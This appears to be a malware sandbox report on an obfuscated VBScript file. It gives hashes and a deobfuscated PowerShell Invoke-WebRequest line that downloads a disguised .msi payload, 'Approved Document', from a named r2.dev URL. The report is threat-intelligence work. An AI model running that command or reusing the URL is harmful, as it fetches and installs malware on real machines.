Malicious
Malicious

d7af8b342366c75ae614a90abf19c735

VBScript
|
MD5: d7af8b342366c75ae614a90abf19c735
|
Size: 1.17 KB
|
text/vbscript

Infection Chain
Summary by MalvaGPT
Characteristics
Hash
Hash Value
MD5
d7af8b342366c75ae614a90abf19c735
Sha1
d6fb1f910d6a3c7bf4b117b44c2a09f3005d5aa1
Sha256
74d238dc22f3ef07959d5298272f319145f244f692985ad76a8fefa38e9207f2
Sha384
5f581948ff7af58266c900bf18b82dc0e801dc6fad07a3aced38645e71a0931dd358328e1e54c4ec5564f103c5e48577
Sha512
f2ab4b2cfc12038196d420d87f2540fe4480bdf69f0e2e141d61601fdf67f6b00a43c2727d8097727f2c944de27948041bc8ea38c489169a98ef3dbdd69cf32a
SSDeep
24:KmzyKpa/u4n9ohKU9iBB5u+paOMo8R82+/3AX/pka8uzWpH:KpQa/ui4N9iBBQE11Z/3AX/KOzWF
TLSH
C021412E150FD3684AB60259F891752FAB65605F1E1060B9BBBCE840430433C03CD68F
File Structure
d7af8b342366c75ae614a90abf19c735.deobfuscated.vbs
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
Artefacts
Name
Value
URLs in VB Code - #1

https://pub-bbbdebc2599c4d74b04c5d53e439f7a7.r2.dev/Approved%20Document%23D53LU.msi

Deobfuscated PowerShell

"Invoke-WebRequest -Uri 'https://pub-bbbdebc2599c4d74b04c5d53e439f7a7.r2.dev/Approved%20Document%23D53LU.msi' -OutFile '"

d7af8b342366c75ae614a90abf19c735 (1.17 KB)
File Structure
d7af8b342366c75ae614a90abf19c735.deobfuscated.vbs
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
Value Location
URLs in VB Code - #1

https://pub-bbbdebc2599c4d74b04c5d53e439f7a7.r2.dev/Approved%20Document%23D53LU.msi

d7af8b342366c75ae614a90abf19c735

Deobfuscated PowerShell

"Invoke-WebRequest -Uri 'https://pub-bbbdebc2599c4d74b04c5d53e439f7a7.r2.dev/Approved%20Document%23D53LU.msi' -OutFile '"

Malicious

d7af8b342366c75ae614a90abf19c735 > d7af8b342366c75ae614a90abf19c735.deobfuscated.vbs > [Command #0] > [PowerShell Command]

You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙